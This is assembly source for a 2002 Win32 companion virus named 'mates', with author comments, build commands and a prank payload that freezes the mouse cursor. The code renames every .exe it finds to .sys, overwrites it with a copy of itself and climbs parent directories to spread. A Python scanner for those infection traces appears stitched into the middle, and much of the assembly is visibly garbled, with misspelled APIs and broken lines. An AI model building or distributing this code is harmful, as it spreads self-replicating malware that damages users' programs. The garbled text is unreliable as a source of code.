Mates.asm


Comment #

_____________________________________________________________________________________________________________________________________________________________________

...: win32.mates - virus :: ...

- Version 1.0 -

- by Dia / Auxnet -

- (c) 02 [Germany] -

_____________________________________________________________________________________________________________________________________________________________________

I am NOT RESPONSIBLE for ANY DAMAGE that you do! You can use the code however you want ...

My mother language is not English, I hope you understand what I mean.

Feel free to write any comments to

DIA_HATES_MACHINE@gmx.de

Why the hell "mates":

This virus is written for all my mates in real life!

How does it work:

- Get da real host's name (.sys)

- Create a thread (virus)

- Run host

Virus->

- Start after five sek

- Rename found .exe file to .sys

- Copy itself in .exe file

- if no more filez in current directory -> cd .. (with my method) - infect again

- When no more filez check counter

- if no payload give full control to host

PayLoad:

- New counter method (via Get/SetCaretBlinkTime)

- Set new caret blink time

- Inc it

- 20 starts of da host ???

- if yes set new caret blink time (-20), stop the mouse cursor and show a message

- If no inc it again and back to host

Special:

- The counter

- Hide da fucking window (with Tasm32)

- Work with threads

Here comes da 1st generation:
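The infection scheme described above is a companion virus: the original `foo.exe` is renamed to `foo.sys` and the virus body is copied into every `foo.exe`, so every infected `.exe` in a directory ends up byte-identical and sits next to a same-named `.sys` that still carries an `MZ` header. The following defender-side scanner is an added example, not part of the original source; it builds a constructed sample tree (file names `host.exe`, `edit.exe`, `clean.exe`, `nic.sys` are invented) and reports both indicators without touching any Windows API.

```python
import hashlib
import os
import tempfile
from collections import defaultdict


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def find_companion_pairs(root):
    """Return (exe_path, sys_path) pairs where foo.exe and foo.sys share a
    directory and the .sys file begins with the 'MZ' executable header."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        names = {f.lower(): f for f in files}
        for lower, real in names.items():
            if not lower.endswith(".exe"):
                continue
            sibling = lower[:-4] + ".sys"
            if sibling in names:
                sys_path = os.path.join(dirpath, names[sibling])
                with open(sys_path, "rb") as f:
                    if f.read(2) == b"MZ":
                        hits.append((os.path.join(dirpath, real), sys_path))
    return hits


def find_identical_exes(root):
    """Group .exe files by SHA-256; several .exe files with one hash is the
    second indicator, since the virus overwrites each host with the same body."""
    by_hash = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            if f.lower().endswith(".exe"):
                p = os.path.join(dirpath, f)
                by_hash[sha256_of(p)].append(p)
    return [paths for paths in by_hash.values() if len(paths) > 1]


def build_sample_tree():
    """Constructed sample: two 'infected' hosts whose originals were renamed to
    .sys, one clean program and one legitimate driver (all contents invented)."""
    root = tempfile.mkdtemp()
    sub = os.path.join(root, "tools")
    os.makedirs(sub)
    body = b"MZ" + b"\x00" * 30 + b"constructed virus body"
    for d, name, data in [(root, "host.exe", body), (root, "host.sys", b"MZ real host A"),
                          (sub, "edit.exe", body), (sub, "edit.sys", b"MZ real host B"),
                          (sub, "clean.exe", b"MZ clean program"), (sub, "nic.sys", b"MZ driver")]:
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return root
```

Run `find_companion_pairs(build_sample_tree())` to see the two host/companion pairs flagged while the lone driver and the clean program are ignored.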

; ----- matessys.asm ----- Cut ------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------

.386

.MODEL FLAT

Jumps

EXTRN Messageboxa: Proc

EXTRN EXITPROCESS: PROC

.DATA

Otitle DB 'saddle? ST generation saddle?, 0

OMSG DB 'this is da 1st generation of win32.mates - virus', 10, 13

DB 'by dia / auxnet', 10, 13

DB 'Have Fun ...', 0

.code

Start:

PUSH 0

Push Offset Otitle

Push offset omsg

PUSH 0

Call Messageboxa

PUSH 0

Call EXITPROCESS

End Start

; --------------------- Cut --------------------------- ----------------------------------------

To Compile The Mates - Virus:

TASM32 / Z / mL / m3 mats,

TLINK32-Tpe -c Mates, Mates, IMPORT32.LIB

To Compile The Mates - SYS:

Tasm32 / z / ml / m3 matsys,

TLINK32-Tpe -c Matessys, Matessys, IMPORT32.LIB

Rename mateys.exe mats.sys

#

; ------------------------------------------------- ------------------------------------------

.386

.MODEL FLAT

Jumps

; ----- Needed API's -------------------------------------------------------------------------------------------------------------------- --------------------------------

EXTRN Messageboxa: Proc

EXTRN SETCONSOLETITLEA: PROC

EXTRN SETCURSORPOS: PROC

EXTRN SETCARETBLINKTIME: PROC

EXTRN SETWINDOWPOS: PROC

EXTRN SETCURRENTDIRECTORYA: PROC

EXTRN SLEEP: PROC

EXTRN FINDWINDOWA: PROC

EXTRN FINDFIRSTFILEA: PROC

EXTRN FINDNEXTFILEA: PROC

EXTRN CRETHREAD: PROC

EXTRN CLOSEHANDLE: PROC

EXTRN COPYFILEA: PROC

EXTRN CREATEPROCESSA: PROC

EXTRN GETCOMMANDLINEA: PROC

EXTRN GETCARETBLINKTIME: PROC

EXTRN LSTRCPYA: PROC

EXTRN EXITPROCESS: PROC

; ------------------------------------------------- ------------------------------------------

; ----- Data's for the Virus -------------------------------------- ----------------------------

.DATA

Otitle DB '[Win32.mates Version 1.0]', 0

OMSG DB 'I Wanna Say Hello To some mats:', 10, 13

db 'o DeathRider - Colorado SuckZ, Bitch;)', 10,13

DB 'o Herr H. - Smoke together!', 10, 13

DB 'o Danny - Rock' 'N roll', 10, 13

DB 'o Pascal - I Need Some Weed ..., 10, 13

DB 'and all the other fuckerz :)', 10, 13

DB 'Ride On and Thanlets for All', 10, 13, 10, 13

DB 'Greetz Dia / AuxNet', 0

Myconsoleti db '.:.', 0

Filemask DB '* .exe', 0

WindowHandle DD 0

ThreadHandle DD 0

ThreadID DD 0

FindHandle DD 0

ProcessInfo DD 4 DUP (0)

Startupinfo DD 4 DUP (0)

Win32FindData DD 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

TargetFile DB 200D DUP (0)

CreateFile DB 200D DUP (0)

VirusFile DB 200D DUP (0)

Hostfile DB 200D DUP (0)

Directory DB 200D DUP (0)

; ------------------------------------------------- ------------------------------------------

; ----- Rock 'N roll ------------------------------------------------------ ----------------------------------

.code

Mates:

; ------------------------------------------------- ------------------------------------------

; ----- Hide Da WINDOW ----------------------------------------- -------------------------------

Mov Eax, Offset MyConsoletitle

Push EAX

Call SetConsoleTitleA

Call Sleep5; It suckz without sleep

Mov Eax, Offset MyConsoletitle

XOR EBX, EBX

Push EAX

Push EBX

Call Findwindowa

Mov DWORD PTR [WindowHandle], EAX

Call Sleep5

Mov Eax, 01

XOR EBX, EBX

Mov EDX, 20000

Push EBX

Push EAX

Push EAX

Push Edx

Push Edx

Push EBX

Push DWORD PTR [WindowHandle]

Call setWindowPOS

; ------------------------------------------------- ------------------------------------------

; ----- Create A Thread (Virus) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------

Mov Eax, Offset ThreadID

XOR ECX, ECX

Mov Edx, Offset Runmates

Call Makethread

; ------------------------------------------------- ------------------------------------------

; --- Get Hostname (.sys) And Run IT --------------------------------- ---------------------

Call getcommandlinea; Via Command Line

Mov Edx, Offset Virusfile

Push EAX

Push Edx

Call lstrcpya

Mov ESI, Offset Virusfile; Fuck DA

Call getPoint

Add ESI, 4D

Mov DWORD PTR [ESI], 00000000H

Push Offset VirusFile 1

Push Offset Hostfile

Call lstrcpya

Mov ESI, Offset Hostfile

Call getPoint

Mov DWORD PTR [ESI], 5359532EH; Rename to .sys

Mov Eax, Offset ProcessInfo

XOR EBX, EBX

Mov ECX, 10h

Mov Edx, Offset StartupInfo

Mov Edi, Offset Hostfile

Push Eax; Run Host

Push Edx

Push EBX

Push EBX

Push ECX

Push EBX

Push EBX

Push EBX

Push EDI

Push EDI

Call CreateProcessa

Wait4mates:

JMP Wait4mates; Wait for Da Virus

; ------------------------------------------------- ------------------------------------------

; ----- Here Startz Da Virus (after 5sek) ------------------------------------ -----------------

Runmates:

Mov Eax, 5000

Push Eax; Wait 5sek Before Run

Call Sleep

; ----- cd .. with another method ------------------------------------------------------------

Mov Eax, Offset Hostfile

Mov Edx, Offset Directory

Push Offset Eax; Copy Host Name 2 Directory

Push Offset EDX

Call lstrcpya

MOV ESI, Offset Directory

Call getPoint

MOV EDI, ESI; Handle IT IN EDI

MOV DWORD PTR [EDI], 00000000H; Fuck Da Point

Dotdot:; IT Workz!

CMP Byte PTR [EDI], '/'

JZ Clearandset

CMP Byte PTR [EDI], ':'; C: / -> Cd .. -> Suckz

JZ Checkblink

Dec Edi

JMP Dotdot

ClearandSet:

Inc EDI

Mov DWORD PTR [EDI], 00000000H

SUB EDI, 2

MOV Eax, Offset Directory

Push EAX

Call setCurrentDirectorya

; ------------------------------------------------- ------------------------------------------

; ----- Infect Some Filez ----------------------------------------- ----------------------------

Mov Eax, Offset Win32Finddata

Mov Edx, Offset Filemask

Push EAX

Push Edx

Call FindfirstFilea

Mov DWORD PTR [FindHandle], EAX

FINDNEXT:

CMP EAX, -1; Error -> Cd ..

Je dotdot

Test Eax, Eax; No More Filez -> Cd ..

JZ Dotdot

Mov Eax, Offset Targetfile

Mov Edx, Offset Createfile

Push EAX

Push Edx

Call lstrcpya

Mov ESI, Offset Createfile

Call getPoint

Mov DWORD PTR [ESI], 5359532EH; Rename to .sys

Mov Eax, Offset Createfile

Mov Edx, Offset Targetfile

Mov ECX, 01

Call copyit

Mov Eax, Offset Targetfile

Mov Edx, Offset VirusFile 1

XOR ECX, ECX

Call copyit

Mov Eax, Offset Win32Finddata

Push Eax; Search More Filez

Push DWORD PTR [FindHandle]

Call FindnextFilea

JMP FindNext

; ------------------------------------------------- ------------------------------------------

; ----- The Funny Part ... The payload ---------------------------------------------------------

Checkblink:

Call getcaretblinktime; kewl counter!

MOV ESI, ESI; Handle IT in ESI

CMP ESI, 1520

Ja set1499; bigger

CMP ESI, 1500

JB set1501; Smarer Than 1500 MIL SEK

GOON:

CMP ESI, 1519

JNE EXIT; EXIT WHEN NOT 1519

Inc ESI

Call setblink; inc DA COUNTER

Mov Eax, Offset ThreadID

XOR ECX, ECX

Mov Edx, Offset Message

Call Makethread; show a nice message

Cursorsleep:; fuck Da CURSOR

Mov Eax, 666

Mov EDX, 999

Push EAX

Push Edx

Call setCursorpos

JMP CURSORSLEP; Foreva;)

EXIT:

Inc ESI

Call setblink; inc DA COUNTER

XOR EAX, EAX; NULL

Push EAX

Call EXITPROCESS; GIVE FULL Control to Host

SET1501:

Mov ESI, 1501

Call setblink

JMP Goon

SET1499:

Mov ESI, 1499; Go from Start

Call setblink

JMP EXIT

Ret; thraedend

; ------------------------------------------------- ------------------------------------------

; ----- Sleep5 Procedure ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------

Sleep5:

Mov Eax, 05

Push EAX

Call Sleep

RET

; ------------------------------------------------- ------------------------------------------

; ----- GetPoint Procedure -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------

GetPoint:

CMP Byte Ptr [ESI], '.'

JZ PointFound

Inc ESI

JMP getPoint

PointFound:

RET

; ------------------------------------------------- ------------------------------------------

; ----- Makethread Procedure ---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------

Makethread:

Push EAX

Push ECX

Push ECX

Push Edx

Push ECX

Push ECX

Call CreateThread

Mov DWORD PTR [ThreadHandle], EAX

Push DWORD PTR [threadHandle]

Call Closehandle

RET

; ---------------------------------------------------------------------------------------------

; ----- Message Thread ------------------------------------------------------------------------

Message:

Mov Eax, Offset Otitle

Mov Edx, Offset OMSG

XOR EBX, EBX

Push EBX

Push EAX

Push Edx

Push EBX

Call Messageboxa

RET

; ------------------------------------------------- ------------------------------------------

; ----- Copyit Procedure ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------

Copyit:

Push ECX

Push EAX

Push Edx

Call Copyfilea

RET

; ------------------------------------------------- ------------------------------------------

; ----- setBlink Procedure ------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------

Setblink:

PUSH ESI

Call setcaretblinktime

RET

; ------------------------------------------------- ------------------------------------------

END MATES
